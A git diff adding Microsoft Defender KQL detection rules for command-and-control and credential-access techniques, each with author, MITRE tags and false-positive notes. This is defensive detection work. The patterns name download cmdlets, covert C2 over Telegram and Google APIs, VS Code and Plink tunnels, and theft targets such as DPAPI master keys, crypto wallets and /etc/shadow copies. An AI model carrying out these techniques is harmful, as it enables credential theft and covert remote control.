Control/suspicious_invoke_webrequest_execution_with_directip.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Invoke-WebRequest Execution With DirectIP +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-21 +// Level: medium +// Description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where (ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains " irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql new file mode 100644 index 00000000..d7490876 --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Mstsc.EXE Execution With Local RDP File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-18 +// Level: high +// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Likelihood is related to how often the paths are used in the environment + +DeviceProcessEvents +| where (ProcessCommandLine endswith ".rdp" or ProcessCommandLine endswith ".rdp\"") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated " or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Downloads\\") \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql new file mode 100644 index 00000000..8bfd93fa --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Non-Browser Network Communication With Google API +// Author: Gavin Knapp +// Date: 2023-05-01 +// Level: medium +// Description: Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102 +// False Positives: +// - Legitimate applications communicating with the "googleapis.com" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning. + +DeviceNetworkEvents +| where (RemoteUrl contains "drive.googleapis.com" or RemoteUrl contains "oauth2.googleapis.com" or RemoteUrl contains "sheets.googleapis.com" or RemoteUrl contains "www.googleapis.com") and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath endswith ":\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or (InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe")) or ((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft\\EdgeCore\\") and (InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe")) or (InitiatingProcessFolderPath endswith ":\\Program Files\\Mozilla Firefox\\firefox.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") or (InitiatingProcessFolderPath contains ":\\Program Files\\Google\\Drive File Stream\\" and InitiatingProcessFolderPath endswith "\\GoogleDriveFS.exe") or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or (InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Internet Explorer\\iexplore.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Internet Explorer\\iexplore.exe") or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql new file mode 100644 index 00000000..9eeb953e --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Non-Browser Network Communication With Telegram API +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-19 +// Level: medium +// Description: Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2 +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.exfiltration, attack.t1102, attack.t1567, attack.t1105 +// False Positives: +// - Legitimate applications communicating with the Telegram API e.g. web browsers not in the exclusion list, app with an RSS etc. + +DeviceNetworkEvents +| where RemoteUrl contains "api.telegram.org" and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql b/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql new file mode 100644 index 00000000..9930d2d0 --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Plink Port Forwarding +// Author: Florian Roth (Nextron Systems) +// Date: 2021-01-19 +// Level: high +// Description: Detects suspicious Plink tunnel port forwarding to a local port +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001 +// False Positives: +// - Administrative activity using a remote port forwarding to a local port + +DeviceProcessEvents +| where ProcessCommandLine contains " -R " and ProcessVersionInfoFileDescription =~ "Command-line SSH, Telnet, and Rlogin client" \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql b/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql new file mode 100644 index 00000000..ec8162c5 --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql @@ -0,0 +1,10 @@ +// Title: Suspicious TSCON Start as SYSTEM +// Author: Florian Roth (Nextron Systems) +// Date: 2018-03-17 +// Level: high +// Description: Detects a tscon.exe start as LOCAL SYSTEM +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 + +DeviceProcessEvents +| where FolderPath endswith "\\tscon.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql b/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql new file mode 100644 index 00000000..235b6f08 --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Velociraptor Child Process +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-08-29 +// Level: high +// Description: Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.persistence, attack.defense-evasion, attack.t1219 +// False Positives: +// - Legitimate administrators or incident responders might use Velociraptor to execute scripts or tools. However, the combination of Velociraptor spawning these specific processes with these command lines is suspicious. Tuning may be required to exclude known administrative actions or specific scripts. + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\Velociraptor.exe" and ((ProcessCommandLine contains "msiexec" and ProcessCommandLine contains "/i" and ProcessCommandLine contains "http") or ((ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IWR " or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "code.exe" and ProcessCommandLine contains "tunnel" and ProcessCommandLine contains "--accept-server-license-terms")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/teamviewer_remote_session.kql b/KQL/rules/Command and Control/teamviewer_remote_session.kql new file mode 100644 index 00000000..74ae312f --- /dev/null +++ b/KQL/rules/Command and Control/teamviewer_remote_session.kql @@ -0,0 +1,12 @@ +// Title: TeamViewer Remote Session +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-30 +// Level: medium +// Description: Detects the creation of log files during a TeamViewer remote session +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate uses of TeamViewer in an organisation + +DeviceFileEvents +| where (FolderPath endswith "\\TeamViewer\\RemotePrinting\\tvprint.db" or FolderPath endswith "\\TeamViewer\\TVNetwork.log") or (FolderPath contains "\\TeamViewer" and FolderPath contains "_Logfile.log") \ No newline at end of file diff --git a/KQL/rules/Command and Control/tor_client_browser_execution.kql b/KQL/rules/Command and Control/tor_client_browser_execution.kql new file mode 100644 index 00000000..bfc1c1fd --- /dev/null +++ b/KQL/rules/Command and Control/tor_client_browser_execution.kql @@ -0,0 +1,10 @@ +// Title: Tor Client/Browser Execution +// Author: frack113 +// Date: 2022-02-20 +// Level: high +// Description: Detects the use of Tor or Tor-Browser to connect to onion routing networks +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.003 + +DeviceProcessEvents +| where FolderPath endswith "\\tor.exe" or FolderPath endswith "\\Tor Browser\\Browser\\firefox.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql b/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql new file mode 100644 index 00000000..b8ab8d3a --- /dev/null +++ b/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql @@ -0,0 +1,12 @@ +// Title: Uncommon Network Connection Initiated By Certutil.EXE +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-09-02 +// Level: high +// Description: Detects a network connection initiated by the certutil.exe utility. +Attackers can abuse the utility in order to download malware or additional payloads. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceNetworkEvents +| where (RemotePort in~ ("80", "135", "443", "445")) and InitiatingProcessFolderPath endswith "\\certutil.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql b/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql new file mode 100644 index 00000000..073def73 --- /dev/null +++ b/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql @@ -0,0 +1,12 @@ +// Title: Use of UltraVNC Remote Access Software +// Author: frack113 +// Date: 2022-10-02 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where ProcessVersionInfoFileDescription =~ "VNCViewer" or ProcessVersionInfoProductName =~ "UltraVNC VNCViewer" or ProcessVersionInfoCompanyName =~ "UltraVNC" or ProcessVersionInfoOriginalFileName =~ "VNCViewer.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql new file mode 100644 index 00000000..0b3c798a --- /dev/null +++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql @@ -0,0 +1,12 @@ +// Title: Visual Studio Code Tunnel Execution +// Author: Nasreddine Bencherchali (Nextron Systems), citron_ninja +// Date: 2023-10-25 +// Level: medium +// Description: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001, attack.t1219 +// False Positives: +// - Legitimate use of Visual Studio Code tunnel + +DeviceProcessEvents +| where (ProcessCommandLine endswith ".exe tunnel" and isnull(ProcessVersionInfoOriginalFileName)) or ((ProcessCommandLine contains "/d /c " and ProcessCommandLine contains "\\servers\\Stable-" and ProcessCommandLine contains "code-server.cmd") and FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine endswith " tunnel") or (ProcessCommandLine contains ".exe tunnel" and ProcessCommandLine contains "--accept-server-license-terms") \ No newline at end of file diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql new file mode 100644 index 00000000..d19487f5 --- /dev/null +++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql @@ -0,0 +1,11 @@ +// Title: Visual Studio Code Tunnel Remote File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-25 +// Level: medium +// Description: Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control + +DeviceFileEvents +| where InitiatingProcessFolderPath contains "\\servers\\Stable-" and InitiatingProcessFolderPath endswith "\\server\\node.exe" and FolderPath contains "\\.vscode-server\\data\\User\\History\\" \ No newline at end of file diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql new file mode 100644 index 00000000..58a39f23 --- /dev/null +++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql @@ -0,0 +1,12 @@ +// Title: Visual Studio Code Tunnel Service Installation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-25 +// Level: medium +// Description: Detects the installation of VsCode tunnel (code-tunnel) as a service. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001 +// False Positives: +// - Legitimate installation of code-tunnel as a service + +DeviceProcessEvents +| where ProcessCommandLine contains "tunnel " and ProcessCommandLine contains "service" and ProcessCommandLine contains "internal-run" and ProcessCommandLine contains "tunnel-service.log" \ No newline at end of file diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql new file mode 100644 index 00000000..9174c8fe --- /dev/null +++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql @@ -0,0 +1,12 @@ +// Title: Visual Studio Code Tunnel Shell Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-25 +// Level: medium +// Description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001 +// False Positives: +// - Legitimate use of Visual Studio Code tunnel and running code from there + +DeviceProcessEvents +| where (InitiatingProcessCommandLine contains ".vscode-server" and InitiatingProcessFolderPath contains "\\servers\\Stable-" and InitiatingProcessFolderPath endswith "\\server\\node.exe") and ((ProcessCommandLine contains "\\terminal\\browser\\media\\shellIntegration.ps1" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\bash.exe")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql b/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql new file mode 100644 index 00000000..b494b440 --- /dev/null +++ b/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql @@ -0,0 +1,12 @@ +// Title: Wget Creating Files in Tmp Directory +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: medium +// Description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp" +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate downloads of files in the tmp folder. + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "/wget" and (FolderPath startswith "/tmp/" or FolderPath startswith "/var/tmp/") \ No newline at end of file diff --git a/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql new file mode 100644 index 00000000..eb039042 --- /dev/null +++ b/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql @@ -0,0 +1,17 @@ +// Title: Access To Crypto Currency Wallets By Uncommon Applications +// Author: X__Junior (Nextron Systems) +// Date: 2024-07-29 +// Level: medium +// Description: Detects file access requests to crypto currency files by uncommon processes. +Could indicate potential attempt of crypto currency wallet stealing. + +// MITRE Tactic: Credential Access +// Tags: attack.t1003, attack.credential-access +// False Positives: +// - Antivirus, Anti-Spyware, Anti-Malware Software +// - Backup software +// - Legitimate software installed on partitions other than "C:\" +// - Searching software such as "everything.exe" + +DeviceFileEvents +| where ((FileName contains "\\AppData\\Roaming\\Ethereum\\keystore\\" or FileName contains "\\AppData\\Roaming\\EthereumClassic\\keystore\\" or FileName contains "\\AppData\\Roaming\\monero\\wallets\\") or (FileName endswith "\\AppData\\Roaming\\Bitcoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\BitcoinABC\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\BitcoinSV\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\DashCore\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\DogeCoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Litecoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Ripple\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Zcash\\wallet.dat")) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql new file mode 100644 index 00000000..a1a05860 --- /dev/null +++ b/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql @@ -0,0 +1,10 @@ +// Title: Access To Potentially Sensitive Sysvol Files By Uncommon Applications +// Author: frack113 +// Date: 2023-12-21 +// Level: medium +// Description: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.006 + +DeviceFileEvents +| where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and (FileName endswith "audit.csv" or FileName endswith "Files.xml" or FileName endswith "GptTmpl.inf" or FileName endswith "groups.xml" or FileName endswith "Registry.pol" or FileName endswith "Registry.xml" or FileName endswith "scheduledtasks.xml" or FileName endswith "scripts.ini" or FileName endswith "services.xml") and FileName startswith "\\") and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql new file mode 100644 index 00000000..dd609165 --- /dev/null +++ b/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql @@ -0,0 +1,12 @@ +// Title: Access To Windows Credential History File By Uncommon Applications +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-17 +// Level: medium +// Description: Detects file access requests to the Windows Credential History File by an uncommon application. +This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.004 + +DeviceFileEvents +| where FileName endswith "\\Microsoft\\Protect\\CREDHIST" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql new file mode 100644 index 00000000..60770bc3 --- /dev/null +++ b/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql @@ -0,0 +1,12 @@ +// Title: Access To Windows DPAPI Master Keys By Uncommon Applications +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-17 +// Level: medium +// Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. +This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.004 + +DeviceFileEvents +| where (FileName contains "\\Microsoft\\Protect\\S-1-5-18\\" or FileName contains "\\Microsoft\\Protect\\S-1-5-21-") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql b/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql new file mode 100644 index 00000000..2f90a1f7 --- /dev/null +++ b/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql @@ -0,0 +1,10 @@ +// Title: Browser Started with Remote Debugging +// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-27 +// Level: medium +// Description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.collection, attack.t1185 + +DeviceProcessEvents +| where ProcessCommandLine contains " --remote-debugging-" or (ProcessCommandLine contains " -start-debugger-server" and FolderPath endswith "\\firefox.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql b/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql new file mode 100644 index 00000000..5dc13da8 --- /dev/null +++ b/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql @@ -0,0 +1,12 @@ +// Title: Capture Credentials with Rpcping.exe +// Author: Julia Fomina, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-s" or ProcessCommandLine contains "/s" or ProcessCommandLine contains "–s" or ProcessCommandLine contains "—s" or ProcessCommandLine contains "―s") and (FolderPath endswith "\\RpcPing.exe" or ProcessVersionInfoOriginalFileName =~ "\\RpcPing.exe")) and ((ProcessCommandLine contains "ncacn_np" and (ProcessCommandLine contains "-t" or ProcessCommandLine contains "/t" or ProcessCommandLine contains "–t" or ProcessCommandLine contains "—t" or ProcessCommandLine contains "―t")) or (ProcessCommandLine contains "NTLM" and (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u" or ProcessCommandLine contains "–u" or ProcessCommandLine contains "—u" or ProcessCommandLine contains "―u"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/certificate_exported_via_powershell.kql b/KQL/rules/Credential Access/certificate_exported_via_powershell.kql new file mode 100644 index 00000000..155368db --- /dev/null +++ b/KQL/rules/Credential Access/certificate_exported_via_powershell.kql @@ -0,0 +1,12 @@ +// Title: Certificate Exported Via PowerShell +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-18 +// Level: medium +// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.execution, attack.t1552.004, attack.t1059.001 +// False Positives: +// - Legitimate certificate exports by administrators. Additional filters might be required. + +DeviceProcessEvents +| where ProcessCommandLine contains "Export-PfxCertificate " or ProcessCommandLine contains "Export-Certificate " \ No newline at end of file diff --git a/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql b/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql new file mode 100644 index 00000000..8121a3b7 --- /dev/null +++ b/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql @@ -0,0 +1,10 @@ +// Title: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-27 +// Level: high +// Description: Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share +// MITRE Tactic: Credential Access +// Tags: attack.credential-access + +DeviceProcessEvents +| where ((ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains " \\\\")) and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql b/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql new file mode 100644 index 00000000..0a42abf5 --- /dev/null +++ b/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql @@ -0,0 +1,10 @@ +// Title: Copy Passwd Or Shadow From TMP Path +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-01-31 +// Level: high +// Description: Detects when the file "passwd" or "shadow" is copied from tmp path +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "passwd" or ProcessCommandLine contains "shadow") and FolderPath endswith "/cp" and ProcessCommandLine contains "/tmp/" \ No newline at end of file diff --git a/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql b/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql new file mode 100644 index 00000000..b8d224e8 --- /dev/null +++ b/KQL/rules/Credential 